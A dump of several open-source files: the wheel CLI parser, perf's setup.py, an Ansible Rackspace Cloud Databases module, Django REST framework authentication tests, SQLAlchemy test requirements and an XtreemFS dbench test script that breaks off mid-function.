dest='wheel_dirs',
help='Directories containing wheels.')
install_parser.add_argument('--requirements-file', '-r',
help="A file containing requirements to "
"install.")
install_parser.add_argument('--list', '-l', default=False,
dest='list_files',
action='store_true',
help="List wheels which would be installed, "
"but don't actually install anything.")
install_parser.set_defaults(func=install_f)
def install_scripts_f(args):
install_scripts(args.distributions)
install_scripts_parser = s.add_parser('install-scripts', help='Install console_scripts')
install_scripts_parser.add_argument('distributions', nargs='*',
help='Regenerate console_scripts for these distributions')
install_scripts_parser.set_defaults(func=install_scripts_f)
def convert_f(args):
convert(args.installers, args.dest_dir, args.verbose)
convert_parser = s.add_parser('convert', help='Convert egg or wininst to wheel')
convert_parser.add_argument('installers', nargs='*', help='Installers to convert')
convert_parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
help="Directory to store wheels (default %(default)s)")
convert_parser.add_argument('--verbose', '-v', action='store_true')
convert_parser.set_defaults(func=convert_f)
def version_f(args):
from .. import __version__
sys.stdout.write("wheel %s\n" % __version__)
version_parser = s.add_parser('version', help='Print version and exit')
version_parser.set_defaults(func=version_f)
def help_f(args):
p.print_help()
help_parser = s.add_parser('help', help='Show this help')
help_parser.set_defaults(func=help_f)
return p
def main():
p = parser()
args = p.parse_args()
if not hasattr(args, 'func'):
p.print_help()
else:
# XXX on Python 3.3 we get 'args has no func' rather than short help.
try:
args.func(args)
return 0
except WheelError as e:
sys.stderr.write(e.message + "\n")
return 1
| mit |
bq/aquaris-M4.5 | tools/perf/util/setup.py | 989 | 1543 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = getenv('CFLAGS', '').split()
# switch off several checks (need to be at the end of cflags list)
cflags += ['-fno-strict-aliasing', '-Wno-write-strings', '-Wno-unused-parameter' ]
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
libtraceevent = getenv('LIBTRACEEVENT')
libapikfs = getenv('LIBAPIKFS')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
extra_objects = [libtraceevent, libapikfs],
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
| gpl-2.0 |
alvaroaleman/ansible-modules-core | cloud/rackspace/rax_cdb.py | 51 | 8115 | #!/usr/bin/python -tt
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
DOCUMENTATION = '''
---
module: rax_cdb
short_description: create/delete or resize a Rackspace Cloud Databases instance
description:
- creates / deletes or resize a Rackspace Cloud Databases instance
and optionally waits for it to be 'running'. The name option needs to be
unique since it's used to identify the instance.
version_added: "1.8"
options:
name:
description:
- Name of the databases server instance
default: null
flavor:
description:
- flavor to use for the instance 1 to 6 (i.e. 512MB to 16GB)
default: 1
volume:
description:
- Volume size of the database 1-150GB
default: 2
cdb_type:
description:
- type of instance (i.e. MySQL, MariaDB, Percona)
default: MySQL
version_added: "2.0"
aliases: ['type']
cdb_version:
description:
- version of database (MySQL supports 5.1 and 5.6, MariaDB supports 10, Percona supports 5.6)
choices: ['5.1', '5.6', '10']
version_added: "2.0"
aliases: ['version']
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
wait:
description:
- wait for the instance to be in state 'running' before returning
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
author: "Simon JAILLET (@jails)"
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
- name: Build a Cloud Databases
gather_facts: False
tasks:
- name: Server build request
local_action:
module: rax_cdb
credentials: ~/.raxpub
region: IAD
name: db-server1
flavor: 1
volume: 2
cdb_type: MySQL
cdb_version: 5.6
wait: yes
state: present
register: rax_db_server
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError:
HAS_PYRAX = False
def find_instance(name):
cdb = pyrax.cloud_databases
instances = cdb.list()
if instances:
for instance in instances:
if instance.name == name:
return instance
return False
def save_instance(module, name, flavor, volume, cdb_type, cdb_version, wait,
wait_timeout):
for arg, value in dict(name=name, flavor=flavor,
volume=volume, type=cdb_type, version=cdb_version
).iteritems():
if not value:
module.fail_json(msg='%s is required for the "rax_cdb"'
' module' % arg)
if not (volume >= 1 and volume <= 150):
module.fail_json(msg='volume is required to be between 1 and 150')
cdb = pyrax.cloud_databases
flavors = []
for item in cdb.list_flavors():
flavors.append(item.id)
if not (flavor in flavors):
module.fail_json(msg='unexisting flavor reference "%s"' % str(flavor))
changed = False
instance = find_instance(name)
if not instance:
action = 'create'
try:
instance = cdb.create(name=name, flavor=flavor, volume=volume,
type=cdb_type, version=cdb_version)
except Exception as e:
module.fail_json(msg='%s' % e.message)
else:
changed = True
else:
action = None
if instance.volume.size != volume:
action = 'resize'
if instance.volume.size > volume:
module.fail_json(changed=False, action=action,
msg='The new volume size must be larger than '
'the current volume size',
cdb=rax_to_dict(instance))
instance.resize_volume(volume)
changed = True
if int(instance.flavor.id) != flavor:
action = 'resize'
pyrax.utils.wait_until(instance, 'status', 'ACTIVE',
attempts=wait_timeout)
instance.resize(flavor)
changed = True
if wait:
pyrax.utils.wait_until(instance, 'status', 'ACTIVE',
attempts=wait_timeout)
if wait and instance.status != 'ACTIVE':
module.fail_json(changed=changed, action=action,
cdb=rax_to_dict(instance),
msg='Timeout waiting for "%s" databases instance to '
'be created' % name)
module.exit_json(changed=changed, action=action, cdb=rax_to_dict(instance))
def delete_instance(module, name, wait, wait_timeout):
if not name:
module.fail_json(msg='name is required for the "rax_cdb" module')
changed = False
instance = find_instance(name)
if not instance:
module.exit_json(changed=False, action='delete')
try:
instance.delete()
except Exception as e:
module.fail_json(msg='%s' % e.message)
else:
changed = True
if wait:
pyrax.utils.wait_until(instance, 'status', 'SHUTDOWN',
attempts=wait_timeout)
if wait and instance.status != 'SHUTDOWN':
module.fail_json(changed=changed, action='delete',
cdb=rax_to_dict(instance),
msg='Timeout waiting for "%s" databases instance to '
'be deleted' % name)
module.exit_json(changed=changed, action='delete',
cdb=rax_to_dict(instance))
def rax_cdb(module, state, name, flavor, volume, cdb_type, cdb_version, wait,
wait_timeout):
# act on the state
if state == 'present':
save_instance(module, name, flavor, volume, cdb_type, cdb_version, wait,
wait_timeout)
elif state == 'absent':
delete_instance(module, name, wait, wait_timeout)
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
name=dict(type='str', required=True),
flavor=dict(type='int', default=1),
volume=dict(type='int', default=2),
cdb_type=dict(type='str', default='MySQL', aliases=['type']),
cdb_version=dict(type='str', default='5.6', aliases=['version']),
state=dict(default='present', choices=['present', 'absent']),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=300),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together(),
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
name = module.params.get('name')
flavor = module.params.get('flavor')
volume = module.params.get('volume')
cdb_type = module.params.get('cdb_type')
cdb_version = module.params.get('cdb_version')
state = module.params.get('state')
wait = module.params.get('wait')
wait_timeout = module.params.get('wait_timeout')
setup_rax_module(module, pyrax)
rax_cdb(module, state, name, flavor, volume, cdb_type, cdb_version, wait, wait_timeout)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
# invoke the module
main()
| gpl-3.0 |
iheitlager/django-rest-framework | tests/test_authentication.py | 75 | 12845 | # coding: utf-8
from __future__ import unicode_literals
import base64
from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.test import TestCase
from django.utils import six
from rest_framework import (
HTTP_HEADER_ENCODING, exceptions, permissions, renderers, status
)
from rest_framework.authentication import (
BaseAuthentication, BasicAuthentication, SessionAuthentication,
TokenAuthentication
)
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from rest_framework.test import APIClient, APIRequestFactory
from rest_framework.views import APIView
factory = APIRequestFactory()
class MockView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
def post(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
def put(self, request):
return HttpResponse({'a': 1, 'b': 2, 'c': 3})
urlpatterns = [
url(r'^session/$', MockView.as_view(authentication_classes=[SessionAuthentication])),
url(r'^basic/$', MockView.as_view(authentication_classes=[BasicAuthentication])),
url(r'^token/$', MockView.as_view(authentication_classes=[TokenAuthentication])),
url(r'^auth-token/$', 'rest_framework.authtoken.views.obtain_auth_token'),
url(r'^auth/', include('rest_framework.urls', namespace='rest_framework')),
]
class BasicAuthTests(TestCase):
"""Basic authentication"""
urls = 'tests.test_authentication'
def setUp(self):
self.csrf_client = APIClient(enforce_csrf_checks=True)
self.username = 'john'
self.email = 'lennon@thebeatles.com'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
def test_post_form_passing_basic_auth(self):
"""Ensure POSTing json over basic auth with correct credentials passes and does not require CSRF"""
credentials = ('%s:%s' % (self.username, self.password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
auth = 'Basic %s' % base64_credentials
response = self.csrf_client.post('/basic/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_json_passing_basic_auth(self):
"""Ensure POSTing form over basic auth with correct credentials passes and does not require CSRF"""
credentials = ('%s:%s' % (self.username, self.password))
base64_credentials = base64.b64encode(credentials.encode(HTTP_HEADER_ENCODING)).decode(HTTP_HEADER_ENCODING)
auth = 'Basic %s' % base64_credentials
response = self.csrf_client.post('/basic/', {'example': 'example'}, format='json', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_failing_basic_auth(self):
"""Ensure POSTing form over basic auth without correct credentials fails"""
response = self.csrf_client.post('/basic/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_failing_basic_auth(self):
"""Ensure POSTing json over basic auth without correct credentials fails"""
response = self.csrf_client.post('/basic/', {'example': 'example'}, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(response['WWW-Authenticate'], 'Basic realm="api"')
class SessionAuthTests(TestCase):
"""User session authentication"""
urls = 'tests.test_authentication'
def setUp(self):
self.csrf_client = APIClient(enforce_csrf_checks=True)
self.non_csrf_client = APIClient(enforce_csrf_checks=False)
self.username = 'john'
self.email = 'lennon@thebeatles.com'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
def tearDown(self):
self.csrf_client.logout()
def test_login_view_renders_on_get(self):
"""
Ensure the login template renders for a basic GET.
cf. [#1810](https://github.com/tomchristie/django-rest-framework/pull/1810)
"""
response = self.csrf_client.get('/auth/login/')
self.assertContains(response, '<label for="id_username">Username:</label>')
def test_post_form_session_auth_failing_csrf(self):
"""
Ensure POSTing form over session authentication without CSRF token fails.
"""
self.csrf_client.login(username=self.username, password=self.password)
response = self.csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_post_form_session_auth_passing(self):
"""
Ensure POSTing form over session authentication with logged in user and CSRF token passes.
"""
self.non_csrf_client.login(username=self.username, password=self.password)
response = self.non_csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_put_form_session_auth_passing(self):
"""
Ensure PUTting form over session authentication with logged in user and CSRF token passes.
"""
self.non_csrf_client.login(username=self.username, password=self.password)
response = self.non_csrf_client.put('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_form_session_auth_failing(self):
"""
Ensure POSTing form over session authentication without logged in user fails.
"""
response = self.csrf_client.post('/session/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TokenAuthTests(TestCase):
"""Token authentication"""
urls = 'tests.test_authentication'
def setUp(self):
self.csrf_client = APIClient(enforce_csrf_checks=True)
self.username = 'john'
self.email = 'lennon@thebeatles.com'
self.password = 'password'
self.user = User.objects.create_user(self.username, self.email, self.password)
self.key = 'abcd1234'
self.token = Token.objects.create(key=self.key, user=self.user)
def test_post_form_passing_token_auth(self):
"""Ensure POSTing json over token auth with correct credentials passes and does not require CSRF"""
auth = 'Token ' + self.key
response = self.csrf_client.post('/token/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_fail_post_form_passing_invalid_token_auth(self):
# add an 'invalid' unicode character
auth = 'Token ' + self.key + "¸"
response = self.csrf_client.post('/token/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_passing_token_auth(self):
"""Ensure POSTing form over token auth with correct credentials passes and does not require CSRF"""
auth = "Token " + self.key
response = self.csrf_client.post('/token/', {'example': 'example'}, format='json', HTTP_AUTHORIZATION=auth)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_post_json_makes_one_db_query(self):
"""Ensure that authenticating a user using a token performs only one DB query"""
auth = "Token " + self.key
def func_to_test():
return self.csrf_client.post('/token/', {'example': 'example'}, format='json', HTTP_AUTHORIZATION=auth)
self.assertNumQueries(1, func_to_test)
def test_post_form_failing_token_auth(self):
"""Ensure POSTing form over token auth without correct credentials fails"""
response = self.csrf_client.post('/token/', {'example': 'example'})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_json_failing_token_auth(self):
"""Ensure POSTing json over token auth without correct credentials fails"""
response = self.csrf_client.post('/token/', {'example': 'example'}, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_token_has_auto_assigned_key_if_none_provided(self):
"""Ensure creating a token with no key will auto-assign a key"""
self.token.delete()
token = Token.objects.create(user=self.user)
self.assertTrue(bool(token.key))
def test_generate_key_returns_string(self):
"""Ensure generate_key returns a string"""
token = Token()
key = token.generate_key()
self.assertTrue(isinstance(key, six.string_types))
def test_token_login_json(self):
"""Ensure token login view using JSON POST works."""
client = APIClient(enforce_csrf_checks=True)
response = client.post('/auth-token/',
{'username': self.username, 'password': self.password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['token'], self.key)
def test_token_login_json_bad_creds(self):
"""Ensure token login view using JSON POST fails if bad credentials are used."""
client = APIClient(enforce_csrf_checks=True)
response = client.post('/auth-token/',
{'username': self.username, 'password': "badpass"}, format='json')
self.assertEqual(response.status_code, 400)
def test_token_login_json_missing_fields(self):
"""Ensure token login view using JSON POST fails if missing fields."""
client = APIClient(enforce_csrf_checks=True)
response = client.post('/auth-token/',
{'username': self.username}, format='json')
self.assertEqual(response.status_code, 400)
def test_token_login_form(self):
"""Ensure token login view using form POST works."""
client = APIClient(enforce_csrf_checks=True)
response = client.post('/auth-token/',
{'username': self.username, 'password': self.password})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['token'], self.key)
class IncorrectCredentialsTests(TestCase):
def test_incorrect_credentials(self):
"""
If a request contains bad authentication credentials, then
authentication should run and error, even if no permissions
are set on the view.
"""
class IncorrectCredentialsAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('Bad credentials')
request = factory.get('/')
view = MockView.as_view(
authentication_classes=(IncorrectCredentialsAuth,),
permission_classes=()
)
response = view(request)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(response.data, {'detail': 'Bad credentials'})
class FailingAuthAccessedInRenderer(TestCase):
def setUp(self):
class AuthAccessingRenderer(renderers.BaseRenderer):
media_type = 'text/plain'
format = 'txt'
def render(self, data, media_type=None, renderer_context=None):
request = renderer_context['request']
if request.user.is_authenticated():
return b'authenticated'
return b'not authenticated'
class FailingAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('authentication failed')
class ExampleView(APIView):
authentication_classes = (FailingAuth,)
renderer_classes = (AuthAccessingRenderer,)
def get(self, request):
return Response({'foo': 'bar'})
self.view = ExampleView.as_view()
def test_failing_auth_accessed_in_renderer(self):
"""
When authentication fails the renderer should still be able to access
`request.user` without raising an exception. Particularly relevant
to HTML responses that might reasonably access `request.user`.
"""
request = factory.get('/')
response = self.view(request)
content = response.render().content
self.assertEqual(content, b'not authenticated')
| bsd-2-clause |
odubno/microblog | flask/lib/python2.7/site-packages/sqlalchemy/testing/requirements.py | 23 | 18002 | # testing/requirements.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Global database feature support policy.
Provides decorators to mark tests requiring specific feature support from the
target database.
External dialect test suites should subclass SuiteRequirements
to provide specific inclusion/exclusions.
"""
from . import exclusions
class Requirements(object):
pass
class SuiteRequirements(Requirements):
@property
def create_table(self):
"""target platform can emit basic CreateTable DDL."""
return exclusions.open()
@property
def drop_table(self):
"""target platform can emit basic DropTable DDL."""
return exclusions.open()
@property
def foreign_keys(self):
"""Target database must support foreign keys."""
return exclusions.open()
@property
def on_update_cascade(self):
""""target database must support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.open()
@property
def non_updating_cascade(self):
"""target database must *not* support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.closed()
@property
def deferrable_fks(self):
return exclusions.closed()
@property
def on_update_or_deferrable_fks(self):
# TODO: exclusions should be composable,
# somehow only_if([x, y]) isn't working here, negation/conjunctions
# getting confused.
return exclusions.only_if(
lambda: self.on_update_cascade.enabled or
self.deferrable_fks.enabled
)
@property
def self_referential_foreign_keys(self):
"""Target database must support self-referential foreign keys."""
return exclusions.open()
@property
def foreign_key_ddl(self):
"""Target database must support the DDL phrases for FOREIGN KEY."""
return exclusions.open()
@property
def named_constraints(self):
"""target database must support names for constraints."""
return exclusions.open()
@property
def subqueries(self):
"""Target database must support subqueries."""
return exclusions.open()
@property
def offset(self):
"""target database can render OFFSET, or an equivalent, in a
SELECT.
"""
return exclusions.open()
@property
def boolean_col_expressions(self):
"""Target database must support boolean expressions as columns"""
return exclusions.closed()
@property
def nullsordering(self):
"""Target backends that support nulls ordering."""
return exclusions.closed()
@property
def standalone_binds(self):
"""target database/driver supports bound parameters as column expressions
without being in the context of a typed column.
"""
return exclusions.closed()
@property
def intersect(self):
"""Target database must support INTERSECT or equivalent."""
return exclusions.closed()
@property
def except_(self):
"""Target database must support EXCEPT or equivalent (i.e. MINUS)."""
return exclusions.closed()
@property
def window_functions(self):
"""Target database must support window functions."""
return exclusions.closed()
@property
def autoincrement_insert(self):
"""target platform generates new surrogate integer primary key values
when insert() is executed, excluding the pk column."""
return exclusions.open()
@property
def fetch_rows_post_commit(self):
"""target platform will allow cursor.fetchone() to proceed after a
COMMIT.
Typically this refers to an INSERT statement with RETURNING which
is invoked within "autocommit". If the row can be returned
after the autocommit, then this rule can be open.
"""
return exclusions.open()
@property
def empty_inserts(self):
"""target platform supports INSERT with no values, i.e.
INSERT DEFAULT VALUES or equivalent."""
return exclusions.only_if(
lambda config: config.db.dialect.supports_empty_insert or
config.db.dialect.supports_default_values,
"empty inserts not supported"
)
@property
def insert_from_select(self):
"""target platform supports INSERT from a SELECT."""
return exclusions.open()
@property
def returning(self):
"""target platform supports RETURNING."""
return exclusions.only_if(
lambda config: config.db.dialect.implicit_returning,
"%(database)s %(does_support)s 'returning'"
)
@property
def duplicate_names_in_cursor_description(self):
"""target platform supports a SELECT statement that has
the same name repeated more than once in the columns list."""
return exclusions.open()
@property
def denormalized_names(self):
"""Target database must have 'denormalized', i.e.
UPPERCASE as case insensitive names."""
return exclusions.skip_if(
lambda config: not config.db.dialect.requires_name_normalize,
"Backend does not require denormalized names."
)
@property
def multivalues_inserts(self):
"""target database must support multiple VALUES clauses in an
INSERT statement."""
return exclusions.skip_if(
lambda config: not config.db.dialect.supports_multivalues_insert,
"Backend does not support multirow inserts."
)
@property
def implements_get_lastrowid(self):
""""target dialect implements the executioncontext.get_lastrowid()
method without reliance on RETURNING.
"""
return exclusions.open()
@property
def emulated_lastrowid(self):
""""target dialect retrieves cursor.lastrowid, or fetches
from a database-side function after an insert() construct executes,
within the get_lastrowid() method.
Only dialects that "pre-execute", or need RETURNING to get last
inserted id, would return closed/fail/skip for this.
"""
return exclusions.closed()
@property
def dbapi_lastrowid(self):
""""target platform includes a 'lastrowid' accessor on the DBAPI
cursor object.
"""
return exclusions.closed()
@property
def views(self):
"""Target database must support VIEWs."""
return exclusions.closed()
@property
def schemas(self):
"""Target database must support external schemas, and have one
named 'test_schema'."""
return exclusions.closed()
@property
def sequences(self):
"""Target database must support SEQUENCEs."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences
], "no sequence support")
@property
def sequences_optional(self):
"""Target database supports sequences, but also optionally
as a means of generating new PK values."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences and
config.db.dialect.sequences_optional
], "no sequence support, or sequences not optional")
@property
def reflects_pk_names(self):
return exclusions.closed()
@property
def table_reflection(self):
return exclusions.open()
@property
def view_column_reflection(self):
"""target database must support retrieval of the columns in a view,
similarly to how a table is inspected.
This does not include the full CREATE VIEW definition.
"""
return self.views
@property
def view_reflection(self):
"""target database must support inspection of the full CREATE VIEW definition.
"""
return self.views
@property
def schema_reflection(self):
return self.schemas
@property
def primary_key_constraint_reflection(self):
return exclusions.open()
@property
def foreign_key_constraint_reflection(self):
return exclusions.open()
@property
def index_reflection(self):
return exclusions.open()
@property
def unique_constraint_reflection(self):
"""target dialect supports reflection of unique constraints"""
return exclusions.open()
@property
def unbounded_varchar(self):
"""Target database must support VARCHAR with no length"""
return exclusions.open()
@property
def unicode_data(self):
"""Target database/dialect must support Python unicode objects with
non-ASCII characters represented, delivered as bound parameters
as well as in result rows.
"""
return exclusions.open()
@property
def unicode_ddl(self):
"""Target driver must support some degree of non-ascii symbol
names.
"""
return exclusions.closed()
@property
def datetime_literals(self):
"""target dialect supports rendering of a date, time, or datetime as a
literal string, e.g. via the TypeEngine.literal_processor() method.
"""
return exclusions.closed()
@property
def datetime(self):
"""target dialect supports representation of Python
datetime.datetime() objects."""
return exclusions.open()
@property
def datetime_microseconds(self):
"""target dialect supports representation of Python
datetime.datetime() with microsecond objects."""
return exclusions.open()
@property
def datetime_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def date(self):
"""target dialect supports representation of Python
datetime.date() objects."""
return exclusions.open()
@property
def date_coerces_from_datetime(self):
"""target dialect accepts a datetime object as the target
of a date column."""
return exclusions.open()
@property
def date_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def time(self):
"""target dialect supports representation of Python
datetime.time() objects."""
return exclusions.open()
@property
def time_microseconds(self):
"""target dialect supports representation of Python
datetime.time() with microsecond objects."""
return exclusions.open()
@property
def binary_comparisons(self):
"""target database/driver can allow BLOB/BINARY fields to be compared
against a bound parameter value.
"""
return exclusions.open()
@property
def binary_literals(self):
"""target backend supports simple binary literals, e.g. an
expression like::
SELECT CAST('foo' AS BINARY)
Where ``BINARY`` is the type emitted from :class:`.LargeBinary`,
e.g. it could be ``BLOB`` or similar.
Basically fails on Oracle.
"""
return exclusions.open()
@property
def precision_numerics_general(self):
"""target backend has general support for moderately high-precision
numerics."""
return exclusions.open()
@property
def precision_numerics_enotation_small(self):
"""target backend supports Decimal() objects using E notation
to represent very small values."""
return exclusions.closed()
@property
def precision_numerics_enotation_large(self):
"""target backend supports Decimal() objects using E notation
to represent very large values."""
return exclusions.closed()
@property
def precision_numerics_many_significant_digits(self):
"""target backend supports values with many digits on both sides,
such as 319438950232418390.273596, 87673.594069654243
"""
return exclusions.closed()
@property
def precision_numerics_retains_significant_digits(self):
"""A precision numeric type will return empty significant digits,
i.e. a value such as 10.000 will come back in Decimal form with
the .000 maintained."""
return exclusions.closed()
@property
def precision_generic_float_type(self):
"""target backend will return native floating point numbers with at
least seven decimal places when using the generic Float type.
"""
return exclusions.open()
@property
def floats_to_four_decimals(self):
"""target backend can return a floating-point number with four
significant digits (such as 15.7563) accurately
(i.e. without FP inaccuracies, such as 15.75629997253418).
"""
return exclusions.open()
@property
def fetch_null_from_numeric(self):
"""target backend doesn't crash when you try to select a NUMERIC
value that has a value of NULL.
Added to support Pyodbc bug #351.
"""
return exclusions.open()
@property
def text_type(self):
"""Target database must support an unbounded Text() "
"type such as TEXT or CLOB"""
return exclusions.open()
@property
def empty_strings_varchar(self):
"""target database can persist/return an empty string with a
varchar.
"""
return exclusions.open()
@property
def empty_strings_text(self):
"""target database can persist/return an empty string with an
unbounded text."""
return exclusions.open()
@property
def selectone(self):
"""target driver must support the literal statement 'select 1'"""
return exclusions.open()
@property
def savepoints(self):
"""Target database must support savepoints."""
return exclusions.closed()
@property
def two_phase_transactions(self):
"""Target database must support two-phase transactions."""
return exclusions.closed()
@property
def update_from(self):
"""Target must support UPDATE..FROM syntax"""
return exclusions.closed()
@property
def update_where_target_in_subquery(self):
"""Target must support UPDATE where the same table is present in a
subquery in the WHERE clause.
This is an ANSI-standard syntax that apparently MySQL can't handle,
such as:
UPDATE documents SET flag=1 WHERE documents.title IN
(SELECT max(documents.title) AS title
FROM documents GROUP BY documents.user_id
)
"""
return exclusions.open()
@property
def mod_operator_as_percent_sign(self):
"""target database must use a plain percent '%' as the 'modulus'
operator."""
return exclusions.closed()
@property
def percent_schema_names(self):
"""target backend supports weird identifiers with percent signs
in them, e.g. 'some % column'.
this is a very weird use case but often has problems because of
DBAPIs that use python formatting. It's not a critical use
case either.
"""
return exclusions.closed()
@property
def order_by_label_with_expression(self):
"""target backend supports ORDER BY a column label within an
expression.
Basically this::
select data as foo from test order by foo || 'bar'
Lots of databases including Postgresql don't support this,
so this is off by default.
"""
return exclusions.closed()
@property
def unicode_connections(self):
"""Target driver must support non-ASCII characters being passed at
all.
"""
return exclusions.open()
@property
def graceful_disconnects(self):
"""Target driver must raise a DBAPI-level exception, such as
InterfaceError, when the underlying connection has been closed
and the execute() method is called.
"""
return exclusions.open()
@property
def skip_mysql_on_windows(self):
"""Catchall for a large variety of MySQL on Windows failures"""
return exclusions.open()
@property
def ad_hoc_engines(self):
"""Test environment must allow ad-hoc engine/connection creation.
DBs that scale poorly for many connections, even when closed, i.e.
Oracle, may use the "--low-connections" option which flags this
requirement as not present.
"""
return exclusions.skip_if(
lambda config: config.options.low_connections)
def _has_mysql_on_windows(self, config):
return False
def _has_mysql_fully_case_sensitive(self, config):
return False
@property
def sqlite(self):
return exclusions.skip_if(lambda: not self._has_sqlite())
@property
def cextensions(self):
return exclusions.skip_if(
lambda: not self._has_cextensions(), "C extensions not installed"
)
def _has_sqlite(self):
from sqlalchemy import create_engine
try:
create_engine('sqlite://')
return True
except ImportError:
return False
def _has_cextensions(self):
try:
from sqlalchemy import cresultproxy, cprocessors
return True
except ImportError:
return False
| bsd-3-clause |
jswrenn/xtreemfs | tests/test_scripts/13_dbench.py | 6 | 2120 | #! /usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2011 by Bjoern Kolbeck, Minor Gordon, Zuse Institute Berlin
# Licensed under the BSD License, see LICENSE file for details.
import unittest, os.path, sys, subprocess, gzip
from datetime import datetime
# Constants
MY_DIR_PATH = os.path.dirname( os.path.abspath( sys.modules[__name__].__file__ ) )
DBENCH_CLIENT_TXT_GZ_FILE_PATH = os.path.join( MY_DIR_PATH, "dbench-client.txt.gz" )
class dbenchTest(unittest.TestCase):
def __init__( self, direct_io=True, stdout=sys.stdout, stderr=sys.stderr, *args, **kwds ):
unittest.TestCase.__init__( self )
self.direct_io = direct_io
self.stdout = stdout
self.stderr = stderr
def runTest( self ):
if self.direct_io:
gzip_client_txt_gz_data = gzip.GzipFile( DBENCH_CLIENT_TXT_GZ_FILE_PATH, mode="rb" ).read()
assert len( gzip_client_txt_gz_data ) > 0
open( "dbench-client.txt", "wb" ).write( gzip_client_txt_gz_data )
assert os.stat( "dbench-client.txt" ).st_size > 0
args = "dbench -c dbench-client.txt -D . 5"
isodatetime = datetime.today().isoformat()[:-7].replace( '-', '' ).replace( ':', '' )
stdout = open(sys.argv[4] + "/log/dbench-stdout-"+isodatetime+".txt", "a+" )
p = subprocess.Popen( args, shell=True, stdout=stdout, stderr=subprocess.STDOUT )
retcode = p.wait()
self.assertEqual( retcode, 0 )
else:
print >>self.stdout, self.__class__.__name__ + ": skipping nondirect volume", os.getcwd()
def createTestSuite( *args, **kwds ):
if not sys.platform.startswith( "win" ):
